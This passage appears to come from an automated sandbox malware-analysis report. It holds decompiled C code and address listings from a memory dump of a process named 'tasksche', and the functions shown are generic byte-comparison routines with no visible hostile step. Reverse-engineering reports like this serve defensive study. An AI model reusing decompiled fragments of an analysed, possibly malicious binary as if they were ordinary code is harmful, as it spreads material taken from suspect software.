                                                                                              							if(__esi == 0) {
                                                                                              								L14:
                                                                                              								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                              								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                              								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                              								if(__esi != 0) {
                                                                                              									0 = 0 | __esi > 0x00000000;
                                                                                              									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                              								}
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							0 = 0 | __esi > 0x00000000;
                                                                                              							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              							__esi = __edx;
                                                                                              							if(__edx != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						0 = 0 | __esi > 0x00000000;
                                                                                              						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              						__esi = __edx;
                                                                                              						if(__edx != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					0 = 0 | __esi > 0x00000000;
                                                                                              					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              					__esi = __edx;
                                                                                              					if(__edx != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t197 = _t316;
                                                                                              				goto L2;
                                                                                              			}

































                                                                                              0x0041bcd9
                                                                                              0x0041bcd9
                                                                                              0x0041bcdf
                                                                                              0x0041bd5f
                                                                                              0x0041bd61
                                                                                              0x0041bd63
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bd69
                                                                                              0x0041bd6f
                                                                                              0x0041bdee
                                                                                              0x0041bdf0
                                                                                              0x0041bdf2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bdf8
                                                                                              0x0041bdfe
                                                                                              0x0041be7d
                                                                                              0x0041be7f
                                                                                              0x0041be81
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041be87
                                                                                              0x0041be8d
                                                                                              0x0041bf0c
                                                                                              0x0041bf0e
                                                                                              0x0041bf10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bf1c
                                                                                              0x0041bf9c
                                                                                              0x0041bf9e
                                                                                              0x0041bfa0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bfa6
                                                                                              0x0041bfac
                                                                                              0x0041c02b
                                                                                              0x0041c02d
                                                                                              0x0041c02f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c035
                                                                                              0x0041c03b
                                                                                              0x0041c0ba
                                                                                              0x0041c0bc
                                                                                              0x0041c0be
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c0cc
                                                                                              0x0041c0ce
                                                                                              0x0041bcb1
                                                                                              0x0041bcb9
                                                                                              0x0041bcbb
                                                                                              0x0041b897
                                                                                              0x0041b89f
                                                                                              0x0041b8a1
                                                                                              0x0041b8b2
                                                                                              0x0041b8b2
                                                                                              0x0041b4a7
                                                                                              0x0041c203
                                                                                              0x0041c203
                                                                                              0x0041bcc8
                                                                                              0x0041bcce
                                                                                              0x0041c0e7
                                                                                              0x0041c0e7
                                                                                              0x00000000
                                                                                              0x0041bcd4
                                                                                              0x00000000
                                                                                              0x0041bcd4
                                                                                              0x0041bcce
                                                                                              0x0041c0db
                                                                                              0x0041c0e1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c0e1
                                                                                              0x0041c044
                                                                                              0x0041c046
                                                                                              0x0041c05d
                                                                                              0x0041c065
                                                                                              0x0041c067
                                                                                              0x0041c07e
                                                                                              0x0041c086
                                                                                              0x0041c088
                                                                                              0x0041c09f
                                                                                              0x0041c0a7
                                                                                              0x0041c0a9
                                                                                              0x0041c0b6
                                                                                              0x0041c0b6
                                                                                              0x00000000
                                                                                              0x0041c0a9
                                                                                              0x0041c095
                                                                                              0x0041c099
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c099
                                                                                              0x0041c074
                                                                                              0x0041c078
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c078
                                                                                              0x0041c053
                                                                                              0x0041c057
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c057
                                                                                              0x0041bfb5
                                                                                              0x0041bfb7
                                                                                              0x0041bfce
                                                                                              0x0041bfd6
                                                                                              0x0041bfd8
                                                                                              0x0041bfef
                                                                                              0x0041bff7
                                                                                              0x0041bff9
                                                                                              0x0041c010
                                                                                              0x0041c018
                                                                                              0x0041c01a
                                                                                              0x0041c027
                                                                                              0x0041c027
                                                                                              0x00000000
                                                                                              0x0041c01a
                                                                                              0x0041c006
                                                                                              0x0041c00a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041c00a
                                                                                              0x0041bfe5
                                                                                              0x0041bfe9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bfe9
                                                                                              0x0041bfc4
                                                                                              0x0041bfc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bfc8
                                                                                              0x0041bf26
                                                                                              0x0041bf28
                                                                                              0x0041bf3f
                                                                                              0x0041bf47
                                                                                              0x0041bf49
                                                                                              0x0041bf60
                                                                                              0x0041bf68
                                                                                              0x0041bf6a
                                                                                              0x0041bf81
                                                                                              0x0041bf89
                                                                                              0x0041bf8b
                                                                                              0x0041bf98
                                                                                              0x0041bf98
                                                                                              0x00000000
                                                                                              0x0041bf8b
                                                                                              0x0041bf77
                                                                                              0x0041bf7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bf7b
                                                                                              0x0041bf56
                                                                                              0x0041bf5a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bf5a
                                                                                              0x0041bf35
                                                                                              0x0041bf39
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bf39
                                                                                              0x0041be96
                                                                                              0x0041be98
                                                                                              0x0041beaf
                                                                                              0x0041beb7
                                                                                              0x0041beb9
                                                                                              0x0041bed0
                                                                                              0x0041bed8
                                                                                              0x0041beda
                                                                                              0x0041bef1
                                                                                              0x0041bef9
                                                                                              0x0041befb
                                                                                              0x0041bf08
                                                                                              0x0041bf08
                                                                                              0x00000000
                                                                                              0x0041befb
                                                                                              0x0041bee7
                                                                                              0x0041beeb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041beeb
                                                                                              0x0041bec6
                                                                                              0x0041beca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041beca
                                                                                              0x0041bea5
                                                                                              0x0041bea9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bea9
                                                                                              0x0041be07
                                                                                              0x0041be09
                                                                                              0x0041be20
                                                                                              0x0041be28
                                                                                              0x0041be2a
                                                                                              0x0041be41
                                                                                              0x0041be49
                                                                                              0x0041be4b
                                                                                              0x0041be62
                                                                                              0x0041be6a
                                                                                              0x0041be6c
                                                                                              0x0041be79
                                                                                              0x0041be79
                                                                                              0x00000000
                                                                                              0x0041be6c
                                                                                              0x0041be58
                                                                                              0x0041be5c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041be5c
                                                                                              0x0041be37
                                                                                              0x0041be3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041be3b
                                                                                              0x0041be16
                                                                                              0x0041be1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041be1a
                                                                                              0x0041bd78
                                                                                              0x0041bd7a
                                                                                              0x0041bd91
                                                                                              0x0041bd99
                                                                                              0x0041bd9b
                                                                                              0x0041bdb2
                                                                                              0x0041bdba
                                                                                              0x0041bdbc
                                                                                              0x0041bdd3
                                                                                              0x0041bddb
                                                                                              0x0041bddd
                                                                                              0x0041bdea
                                                                                              0x0041bdea
                                                                                              0x00000000
                                                                                              0x0041bddd
                                                                                              0x0041bdc9
                                                                                              0x0041bdcd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bdcd
                                                                                              0x0041bda8
                                                                                              0x0041bdac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bdac
                                                                                              0x0041bd87
                                                                                              0x0041bd8b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bce1
                                                                                              0x0041bce1
                                                                                              0x0041bce5
                                                                                              0x0041bce9
                                                                                              0x0041bceb
                                                                                              0x0041bd02
                                                                                              0x0041bd02
                                                                                              0x0041bd06
                                                                                              0x0041bd0a
                                                                                              0x0041bd0c
                                                                                              0x0041bd23
                                                                                              0x0041bd23
                                                                                              0x0041bd27
                                                                                              0x0041bd2b
                                                                                              0x0041bd2d
                                                                                              0x0041bd44
                                                                                              0x0041bd44
                                                                                              0x0041bd48
                                                                                              0x0041bd4c
                                                                                              0x0041bd4e
                                                                                              0x0041bd54
                                                                                              0x0041bd57
                                                                                              0x0041bd5b
                                                                                              0x0041bd5b
                                                                                              0x00000000
                                                                                              0x0041bd4e
                                                                                              0x0041bd33
                                                                                              0x0041bd36
                                                                                              0x0041bd3a
                                                                                              0x0041bd3e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bd3e
                                                                                              0x0041bd12
                                                                                              0x0041bd15
                                                                                              0x0041bd19
                                                                                              0x0041bd1d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bd1d
                                                                                              0x0041bcf1
                                                                                              0x0041bcf4
                                                                                              0x0041bcf8
                                                                                              0x0041bcfc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bcfc
                                                                                              0x0041b0d2
                                                                                              0x0041b0d2
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                              • Instruction ID: fa64fecedd4ee0fbc6ebc6d5fd45eff142ec883d8ec5514f9c97111b8272a84e
                                                                                              • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                              • Instruction Fuzzy Hash: 93D18E73C0E9B34A8735812D84582BBEE62AFD175031EC3E2DCE42F389D62B5D9196D4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041B8B9(void* __eax, void* __ecx) {
                                                                                              				void* _t191;
                                                                                              				signed int _t192;
                                                                                              				void* _t195;
                                                                                              				signed char _t201;
                                                                                              				signed char _t202;
                                                                                              				signed char _t203;
                                                                                              				signed char _t204;
                                                                                              				signed char _t206;
                                                                                              				signed int _t211;
                                                                                              				signed int _t309;
                                                                                              				void* _t312;
                                                                                              				void* _t314;
                                                                                              				void* _t316;
                                                                                              				void* _t318;
                                                                                              				void* _t321;
                                                                                              				void* _t323;
                                                                                              				void* _t325;
                                                                                              				void* _t328;
                                                                                              				void* _t330;
                                                                                              				void* _t332;
                                                                                              				void* _t335;
                                                                                              				void* _t337;
                                                                                              				void* _t339;
                                                                                              				void* _t342;
                                                                                              				void* _t344;
                                                                                              				void* _t346;
                                                                                              				void* _t349;
                                                                                              				void* _t351;
                                                                                              				void* _t353;
                                                                                              
                                                                                              				_t195 = __ecx;
                                                                                              				_t191 = __eax;
                                                                                              				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                              					_t309 = 0;
                                                                                              					L15:
                                                                                              					if(_t309 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					_t201 =  *(_t191 - 0x1a);
                                                                                              					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                              						_t309 = 0;
                                                                                              						L26:
                                                                                              						if(_t309 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t202 =  *(_t191 - 0x16);
                                                                                              						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                              							_t309 = 0;
                                                                                              							L37:
                                                                                              							if(_t309 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							_t203 =  *(_t191 - 0x12);
                                                                                              							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                              								_t309 = 0;
                                                                                              								L48:
                                                                                              								if(_t309 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								_t204 =  *(_t191 - 0xe);
                                                                                              								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                              									_t309 = 0;
                                                                                              									L59:
                                                                                              									if(_t309 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                              										_t309 = 0;
                                                                                              										L70:
                                                                                              										if(_t309 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										_t206 =  *(_t191 - 6);
                                                                                              										if(_t206 ==  *(_t195 - 6)) {
                                                                                              											_t309 = 0;
                                                                                              											L81:
                                                                                              											if(_t309 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                              												_t192 = 0;
                                                                                              												L3:
                                                                                              												return _t192;
                                                                                              											}
                                                                                              											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                              											if(_t312 == 0) {
                                                                                              												L4:
                                                                                              												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                              												if(_t192 != 0) {
                                                                                              													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                              												}
                                                                                              												goto L3;
                                                                                              											}
                                                                                              											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                              											if(_t211 != 0) {
                                                                                              												_t192 = _t211;
                                                                                              												goto L3;
                                                                                              											}
                                                                                              											goto L4;
                                                                                              										}
                                                                                              										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                              										if(_t314 == 0) {
                                                                                              											L74:
                                                                                              											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                              											if(_t316 == 0) {
                                                                                              												L76:
                                                                                              												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                              												if(_t318 == 0) {
                                                                                              													L78:
                                                                                              													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                              													if(_t309 != 0) {
                                                                                              														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              													}
                                                                                              													goto L81;
                                                                                              												}
                                                                                              												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                              												if(_t309 != 0) {
                                                                                              													goto L1;
                                                                                              												}
                                                                                              												goto L78;
                                                                                              											}
                                                                                              											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                              											if(_t309 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L76;
                                                                                              										}
                                                                                              										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                              										if(_t309 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L74;
                                                                                              									}
                                                                                              									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                              									if(_t321 == 0) {
                                                                                              										L63:
                                                                                              										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                              										if(_t323 == 0) {
                                                                                              											L65:
                                                                                              											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                              											if(_t325 == 0) {
                                                                                              												L67:
                                                                                              												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                              												if(_t309 != 0) {
                                                                                              													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              												}
                                                                                              												goto L70;
                                                                                              											}
                                                                                              											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                              											if(_t309 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L67;
                                                                                              										}
                                                                                              										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                              										if(_t309 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L65;
                                                                                              									}
                                                                                              									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                              									if(_t309 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L63;
                                                                                              								}
                                                                                              								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                              								if(_t328 == 0) {
                                                                                              									L52:
                                                                                              									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                              									if(_t330 == 0) {
                                                                                              										L54:
                                                                                              										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                              										if(_t332 == 0) {
                                                                                              											L56:
                                                                                              											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                              											if(_t309 != 0) {
                                                                                              												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              											}
                                                                                              											goto L59;
                                                                                              										}
                                                                                              										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                              										if(_t309 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L56;
                                                                                              									}
                                                                                              									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                              									if(_t309 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L54;
                                                                                              								}
                                                                                              								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                                                                                              								if(_t309 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L52;
                                                                                              							}
                                                                                              							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                              							if(_t335 == 0) {
                                                                                              								L41:
                                                                                              								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                              								if(_t337 == 0) {
                                                                                              									L43:
                                                                                              									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                              									if(_t339 == 0) {
                                                                                              										L45:
                                                                                              										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                              										if(_t309 != 0) {
                                                                                              											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              										}
                                                                                              										goto L48;
                                                                                              									}
                                                                                              									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                              									if(_t309 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L45;
                                                                                              								}
                                                                                              								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                              								if(_t309 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L43;
                                                                                              							}
                                                                                              							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                                                                                              							if(_t309 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L41;
                                                                                              						}
                                                                                              						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                              						if(_t342 == 0) {
                                                                                              							L30:
                                                                                              							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                              							if(_t344 == 0) {
                                                                                              								L32:
                                                                                              								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                              								if(_t346 == 0) {
                                                                                              									L34:
                                                                                              									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                              									if(_t309 != 0) {
                                                                                              										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              									}
                                                                                              									goto L37;
                                                                                              								}
                                                                                              								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                              								if(_t309 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L34;
                                                                                              							}
                                                                                              							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                              							if(_t309 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L32;
                                                                                              						}
                                                                                              						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                                                                                              						if(_t309 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L30;
                                                                                              					}
                                                                                              					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                              					if(_t349 == 0) {
                                                                                              						L19:
                                                                                              						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                              						if(_t351 == 0) {
                                                                                              							L21:
                                                                                              							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                              							if(_t353 == 0) {
                                                                                              								L23:
                                                                                              								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                              								if(_t309 != 0) {
                                                                                              									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                              								}
                                                                                              								goto L26;
                                                                                              							}
                                                                                              							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                              							if(_t309 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                              						if(_t309 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L21;
                                                                                              					}
                                                                                              					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                                                                                              					if(_t309 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L19;
                                                                                              				} else {
                                                                                              					__esi = __dl & 0x000000ff;
                                                                                              					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                              					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                              					if(__esi == 0) {
                                                                                              						L8:
                                                                                              						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                              						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                              						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                              						if(__esi == 0) {
                                                                                              							L10:
                                                                                              							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                              							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                              							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                              							if(__esi == 0) {
                                                                                              								L12:
                                                                                              								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                              								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                              								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                              								if(__esi != 0) {
                                                                                              									0 = 0 | __esi > 0x00000000;
                                                                                              									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                              								}
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							0 = 0 | __esi > 0x00000000;
                                                                                              							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              							__esi = __edx;
                                                                                              							if(__edx != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						0 = 0 | __esi > 0x00000000;
                                                                                              						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              						__esi = __edx;
                                                                                              						if(__edx != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					0 = 0 | __esi > 0x00000000;
                                                                                              					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              					__esi = __edx;
                                                                                              					if(__edx != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L8;
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t192 = _t309;
                                                                                              				goto L3;
                                                                                              			}
































                                                                                              0x0041b8b9
                                                                                              0x0041b8b9
                                                                                              0x0041b8bf
                                                                                              0x0041b93e
                                                                                              0x0041b940
                                                                                              0x0041b942
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b948
                                                                                              0x0041b94e
                                                                                              0x0041b9cd
                                                                                              0x0041b9cf
                                                                                              0x0041b9d1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b9d7
                                                                                              0x0041b9dd
                                                                                              0x0041ba5c
                                                                                              0x0041ba5e
                                                                                              0x0041ba60
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041ba66
                                                                                              0x0041ba6c
                                                                                              0x0041baeb
                                                                                              0x0041baed
                                                                                              0x0041baef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041baf5
                                                                                              0x0041bafb
                                                                                              0x0041bb7a
                                                                                              0x0041bb7c
                                                                                              0x0041bb7e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bb8a
                                                                                              0x0041bc0a
                                                                                              0x0041bc0c
                                                                                              0x0041bc0e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bc14
                                                                                              0x0041bc1a
                                                                                              0x0041bc99
                                                                                              0x0041bc9b
                                                                                              0x0041bc9d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bcab
                                                                                              0x0041b4a5
                                                                                              0x0041b4a7
                                                                                              0x0041c203
                                                                                              0x0041c203
                                                                                              0x0041bcb9
                                                                                              0x0041bcbb
                                                                                              0x0041b897
                                                                                              0x0041b89f
                                                                                              0x0041b8a1
                                                                                              0x0041b8b2
                                                                                              0x0041b8b2
                                                                                              0x00000000
                                                                                              0x0041b8a1
                                                                                              0x0041bcc8
                                                                                              0x0041bcce
                                                                                              0x0041c0e7
                                                                                              0x00000000
                                                                                              0x0041c0e7
                                                                                              0x00000000
                                                                                              0x0041bcd4
                                                                                              0x0041bc23
                                                                                              0x0041bc25
                                                                                              0x0041bc3c
                                                                                              0x0041bc44
                                                                                              0x0041bc46
                                                                                              0x0041bc5d
                                                                                              0x0041bc65
                                                                                              0x0041bc67
                                                                                              0x0041bc7e
                                                                                              0x0041bc86
                                                                                              0x0041bc88
                                                                                              0x0041bc95
                                                                                              0x0041bc95
                                                                                              0x00000000
                                                                                              0x0041bc88
                                                                                              0x0041bc74
                                                                                              0x0041bc78
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bc78
                                                                                              0x0041bc53
                                                                                              0x0041bc57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bc57
                                                                                              0x0041bc32
                                                                                              0x0041bc36
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bc36
                                                                                              0x0041bb94
                                                                                              0x0041bb96
